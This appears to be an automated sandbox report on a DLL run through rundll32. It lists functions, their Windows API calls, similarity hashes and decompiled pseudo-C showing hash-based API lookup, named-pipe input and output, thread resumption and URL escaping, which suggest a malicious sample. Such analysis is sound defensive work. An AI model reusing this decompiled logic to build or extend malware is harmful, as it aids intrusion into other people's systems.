Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20

Strings

, xrefs: 0000000180004B45
@, xrefs: 0000000180004A69

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLast$memcpy$memset
String ID: $@
API String ID: 1408984137-1077428164
Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003A24 Relevance: 10.6, APIs: 7, Instructions: 137
synchronizationthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				long _t49;
				void* _t54;
				void* _t72;
				signed long long _t94;
				signed long long _t95;
				long long* _t97;
				int _t112;
				void* _t113;
				signed long long _t118;
				void* _t120;
				long long* _t126;
				void* _t128;
				signed long long _t129;
				void* _t131;

				 *((long long*)(_t120 + 8)) = __rbx;
				 *(_t120 + 0x10) = _t118;
				 *((long long*)(_t120 + 0x18)) = __rsi;
				_t116 =  *0x8000d4a0;
				_t113 = __r9;
				_t97 = __rcx;
				if (__r9 != 0) goto 0x80003a5b;
				goto 0x80003be2;
				r8d = 0x10;
				memcpy(_t131, _t128, _t112);
				InitializeCriticalSection(??);
				_t6 = _t97 + 0x88; // 0x88
				_t126 = _t6;
				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
				_t129 = _t128 | 0xffffffff;
				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
				r13d = _t129 + 2;
				r9d = 0;
				r8d = 0;
				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
				 *((long long*)(__rcx + 0x90)) = _t126;
				 *_t126 = _t126;
				 *(__rcx + 0x10) = _t129;
				CreateEventA(??, ??, ??, ??);
				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				r9d = 0;
				r8d = 0;
				CreateEventA(??, ??, ??, ??);
				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
				r8d = 0;
				CreateMutexA(??, ??, ??);
				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
				 *(__rcx + 0x38) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
				 *_t97 = E00000001180008368;
				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				_t72 = _t129 + 7;
				if (E00000001180008368 == 0) goto 0x80003b4c;
				r8d = _t72;
				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
				goto 0x80003b4f;
				_t94 = _t129;
				 *(_t97 + 0x10) = _t94;
				if (_t94 != _t129) goto 0x80003bb0;
				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t94 == 0) goto 0x80003b79;
				 *_t94();
				goto 0x80003b7b;
				if (0 != 0) goto 0x80003bd6;
				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t94 == 0) goto 0x80003ba4;
				r8d = _t72;
				 *_t94();
				goto 0x80003ba7;
				_t95 = _t129;
				 *(_t97 + 0x10) = _t95;
				if (_t95 == _t129) goto 0x80003bd6;
				_t28 = _t97 + 0x18; // 0x18
				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
				 *(_t97 + 8) = _t95;
				if (_t95 == 0) goto 0x80003bd6;
				SwitchToThread();
				goto 0x80003c03;
				_t49 = GetLastError();
				if (_t49 == 0) goto 0x80003c03;
				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
				if (r13d == 0) goto 0x80003c03;
				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t95 == 0) goto 0x80003c03;
				 *_t95();
				return _t49;
			}

APIs

memcpy.NTDLL ref: 0000000180003A65
InitializeCriticalSection.KERNEL32 ref: 0000000180003A6E
CreateEventA.KERNEL32 ref: 0000000180003AC7
CreateEventA.KERNEL32 ref: 0000000180003AE5
CreateMutexA.KERNEL32 ref: 0000000180003B03
SwitchToThread.KERNEL32 ref: 0000000180003BCC

Part of subcall function 0000000180007950: SetEvent.KERNEL32 ref: 000000018000798D
Part of subcall function 0000000180007950: WaitForSingleObject.KERNEL32 ref: 00000001800079AA
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 00000001800079B4
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 00000001800079C3
Part of subcall function 0000000180007950: EnterCriticalSection.KERNEL32 ref: 00000001800079CD
Part of subcall function 0000000180007950: LeaveCriticalSection.KERNEL32 ref: 00000001800079F4
Part of subcall function 0000000180007950: Sleep.KERNEL32 ref: 0000000180007A17
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 0000000180007A2F
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 0000000180007A3E
Part of subcall function 0000000180007950: HeapFree.KERNEL32 ref: 0000000180007A51
Part of subcall function 0000000180007950: DeleteCriticalSection.KERNEL32 ref: 0000000180007A5B

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
String ID:
API String ID: 810493412-0
Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002B60 Relevance: 7.7, APIs: 5, Instructions: 244
memorytimeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00000001180002B60(void* __esi, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t79;
				signed int _t94;
				void* _t143;
				void* _t144;
				long long _t174;
				long long* _t175;
				long long* _t178;
				void* _t180;
				long long _t182;
				void* _t190;
				intOrPtr _t211;
				void* _t224;
				void* _t225;
				long long _t228;
				void* _t229;
				void* _t255;
				signed long long _t256;

				_t256 = __r11;
				_t255 = __r10;
				_t144 = __esi;
				_t174 = _t228;
				_t229 = _t228 - 0x60;
				r12d =  *0x8000d498;
				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
				_t225 = __rcx;
				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
				if (_t79 == 0) goto 0x80002bd9;
				HeapFree(??, ??, ??);
				if (_t79 != 0) goto 0x80002f0d;
				_t190 = _t229 + 0x48;
				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
				_t182 = _t174;
				goto 0x80002c2d;
				if (_t182 == 0) goto 0x80002ec8;
				_t21 = _t225 + 0xb0; // 0xb0
				 *((long long*)(_t229 + 0x28)) = _t182;
				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
				_t175 =  *((intOrPtr*)(_t225 + 0x28));
				 *((long long*)(_t229 + 0x40)) = _t175;
				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
				goto 0x80002cb8;
				 *(_t229 + 0xa8) = 0;
				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				r15d = 0x7f;
				if (_t175 == 0) goto 0x80002cec;
				r9d = 0;
				r8d = 0;
				 *_t175();
				goto 0x80002cef;
				if (r15d != 0x102) goto 0x80002ec8;
				 *(_t225 + 0x64) = 0x3e8;
				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
				r9d = 0;
				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
				_t94 =  *(_t229 + 0xa8);
				if (_t94 == 0) goto 0x80002d8f;
				 *(_t225 + 0x64) = _t94 * 0x3e8;
				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
				goto 0x80002ddb;
				 *(_t229 + 0xa8) = 0;
				r12d = r12d ^ 0xe5c7ba87;
				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
				GetSystemTimeAsFileTime(??);
				r11d =  *((intOrPtr*)(_t229 + 0xb8));
				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
				 *((long long*)(_t225 + 0x58)) = _t178;
				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
				r8d =  *((intOrPtr*)(_t229 + 0x30));
				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t178 == 0) goto 0x80002e97;
				r8d = 0;
				r9d = 0;
				r9d = r9d * 0x3e8;
				 *_t178();
				goto 0x80002e9a;
				_t143 = r15d;
				if (_t143 != 0) goto 0x80002e40;
				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
				HeapFree(??, ??, ??);
				E00000001180002620();
				_t211 =  *0x8000d4a0;
				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
				HeapFree(??, ??, ??);
				asm("lock inc ecx");
				return _t143;
			}

APIs

Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476

Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7

HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
HeapFree.KERNEL32 ref: 0000000180002EC2
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Free$Heap$LibraryTime$FileLoadSystem
String ID:
API String ID: 1415693639-0
Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800027D4 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 187
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t100;
				long long* _t119;
				long long* _t120;
				long long* _t121;
				long long* _t122;
				long long* _t123;
				void* _t151;
				void* _t152;
				intOrPtr* _t153;
				void* _t155;
				void* _t158;
				long long* _t161;
				void* _t163;
				void* _t164;
				long _t176;
				void* _t178;
				void* _t181;
				void* _t184;

				_t123 = __rbx;
				 *((long long*)(_t163 + 0x10)) = __rbx;
				 *(_t163 + 0x18) = r8d;
				_t164 = _t163 - 0x50;
				_t119 =  *0x8000d4a0;
				_t156 =  *__rcx;
				_t153 = __rcx;
				r15d = r9d;
				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
				if (_t119 == _t123) goto 0x80002a78;
				_t100 =  *((char*)(_t153 + 0x75)) - 6;
				_t5 = _t123 + 4; // 0x4
				r12d = _t5;
				if (_t100 > 0) goto 0x8000283e;
				if (_t100 != 0) goto 0x80002835;
				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
				 *((intOrPtr*)(_t164 + 0x90)) = 0;
				goto 0x80002846;
				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t119 == _t123) goto 0x80002871;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t164 + 0x20)) = 0;
				 *_t119();
				goto 0x80002874;
				_t120 = _t123;
				 *((long long*)(_t153 + 0x28)) = _t120;
				HeapFree(_t178, _t176, _t152);
				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x800028c4;
				_t17 = _t164 + 0xa0; // 0x12
				r9d = r12d;
				 *_t120();
				goto 0x800028c6;
				if (0 == 0) goto 0x80002a78;
				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
				if (_t120 == _t123) goto 0x80002a78;
				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x80002927;
				r9d = r12d;
				 *_t120();
				asm("bts dword [esp+0x90], 0x17");
				r12d = 0x1bb;
				goto 0x8000293e;
				r12d = 0x50;
				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x80002963;
				r9d = 0;
				r8d = r12w & 0xffffffff;
				 *_t120();
				goto 0x80002966;
				_t121 = _t123;
				 *((long long*)(_t153 + 0x30)) = _t121;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
				_t161 = _t121;
				if (_t121 == _t123) goto 0x80002a78;
				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t121 == _t123) goto 0x800029ed;
				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
				r9d = 0;
				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
				 *((long long*)(_t164 + 0x28)) = _t123;
				 *((long long*)(_t164 + 0x20)) = _t123;
				 *_t121();
				goto 0x800029f0;
				_t122 = _t123;
				 *((long long*)(_t153 + 0x38)) = _t122;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
				 *((intOrPtr*)(_t164 + 0x44)) = 4;
				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
				_t45 = _t161 + 0x1b; // 0x1f
				r12d = _t45;
				if (_t122 == _t123) goto 0x80002a40;
				 *_t122();
				goto 0x80002a42;
				if (0 == 0) goto 0x80002a80;
				asm("bts dword [esp+0x90], 0x8");
				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t122 == _t123) goto 0x80002a80;
				r9d = 4;
				 *_t122();
				goto 0x80002a80;
				return GetLastError();
			}

APIs

Part of subcall function 0000000180007B04: lstrlenA.KERNEL32 ref: 0000000180007B2B
Part of subcall function 0000000180007B04: HeapAlloc.KERNEL32 ref: 0000000180007B46
Part of subcall function 0000000180007B04: memset.NTDLL ref: 0000000180007B71

HeapFree.KERNEL32 ref: 0000000180002880
HeapFree.KERNEL32 ref: 0000000180002972
HeapFree.KERNEL32 ref: 00000001800029FC
GetLastError.KERNEL32(00000012,00000000,?,00000001800054C9,?,000000018000134F), ref: 0000000180002A78

Strings

P, xrefs: 0000000180002938

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$AllocErrorLastlstrlenmemset
String ID: P
API String ID: 1242601240-3110715001
Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008368 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 154
filepipethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32 ref: 000000018000839A
ResumeThread.KERNEL32 ref: 00000001800083EE
GetExitCodeProcess.KERNEL32 ref: 00000001800083FD
PeekNamedPipe.KERNEL32 ref: 0000000180008437
ReadFile.KERNEL32 ref: 0000000180008465
WriteFile.KERNEL32 ref: 00000001800084DC
WaitForMultipleObjects.KERNEL32 ref: 0000000180008500
WriteFile.KERNEL32 ref: 0000000180008567
ResetEvent.KERNEL32 ref: 0000000180008576
GetLastError.KERNEL32 ref: 000000018000858B
GetLastError.KERNEL32 ref: 0000000180008598
CloseHandle.KERNEL32 ref: 00000001800085AA

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Strings

.RK, xrefs: 000000018000851D

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
String ID: .RK
API String ID: 1606758550-3354657194
Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800031D4 Relevance: 18.1, APIs: 12, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180006A84: HeapAlloc.KERNEL32 ref: 0000000180006B46
Part of subcall function 0000000180006A84: HeapFree.KERNEL32 ref: 0000000180006B78
Part of subcall function 0000000180006A84: HeapFree.KERNEL32 ref: 0000000180006B86

lstrlenA.KERNEL32(00000000,0000000180006466), ref: 0000000180003221
HeapAlloc.KERNEL32 ref: 0000000180003239
memcpy.NTDLL ref: 0000000180003259
lstrcpyA.KERNEL32 ref: 0000000180003265
lstrlenA.KERNEL32 ref: 000000018000326E

Part of subcall function 0000000180001208: EnterCriticalSection.KERNEL32(?,000000018000134F), ref: 0000000180001256
Part of subcall function 0000000180001208: LeaveCriticalSection.KERNEL32 ref: 0000000180001265
Part of subcall function 0000000180001208: HeapAlloc.KERNEL32 ref: 000000018000129C

HeapFree.KERNEL32 ref: 000000018000329E

Part of subcall function 000000018000467C: HeapAlloc.KERNEL32 ref: 00000001800046D2

HeapAlloc.KERNEL32 ref: 0000000180003316
UrlEscapeA.SHLWAPI ref: 0000000180003335
HeapFree.KERNEL32 ref: 0000000180003358
HeapFree.KERNEL32 ref: 000000018000336D
HeapFree.KERNEL32 ref: 000000018000337D
HeapFree.KERNEL32 ref: 000000018000338B

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
String ID:
API String ID: 1109037607-0
Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007950 Relevance: 18.1, APIs: 12, Instructions: 78sleepmemorysynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 000000018000798D
WaitForSingleObject.KERNEL32 ref: 00000001800079AA
CloseHandle.KERNEL32 ref: 00000001800079B4
CloseHandle.KERNEL32 ref: 00000001800079C3
EnterCriticalSection.KERNEL32 ref: 00000001800079CD
LeaveCriticalSection.KERNEL32 ref: 00000001800079F4
Sleep.KERNEL32 ref: 0000000180007A03
Sleep.KERNEL32 ref: 0000000180007A17
CloseHandle.KERNEL32 ref: 0000000180007A2F
CloseHandle.KERNEL32 ref: 0000000180007A3E
HeapFree.KERNEL32 ref: 0000000180007A51
DeleteCriticalSection.KERNEL32 ref: 0000000180007A5B

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
String ID:
API String ID: 2177250193-0
Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A6EC Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 200libraryCOMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000018000A783
LoadLibraryA.KERNEL32 ref: 000000018000A829
GetLastError.KERNEL32 ref: 000000018000A837
RaiseException.KERNEL32 ref: 000000018000A87F

Strings

H, xrefs: 000000018000A710

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: H
API String ID: 948315288-2852464175
Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
